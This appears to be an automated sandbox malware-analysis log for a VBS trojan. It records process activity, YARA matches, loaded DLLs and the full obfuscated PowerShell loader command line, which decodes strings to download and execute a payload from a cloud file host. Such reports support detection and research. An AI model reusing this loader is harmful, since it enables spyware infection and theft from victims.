            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_006225D3
            Source: Umulighed.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi64_6912.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi32_6208.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6912, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6208, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@15/8@4/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Klapjagters.Sep
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arxcys0t.gux.ps1
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs"
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: P^)u10_2_00621C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: WABOpen10_2_00621C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: 5b10_2_00623530
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6912
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6208
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? 
FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? 
FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
            Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: schannel.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mskeyprotect.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ntasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: gpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncrypt.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncryptsslp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mscoree.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: version.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wbemcomn.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: amsi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: userenv.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasman.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rtutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ntmarta.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: vaultcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: secur32.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: cryptdlg.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: msoert2.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: msimg32.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: cryptui.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: msftedit.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: edputil.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: explorerframe.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: sxs.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: actxprxy.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: iertutil.dll
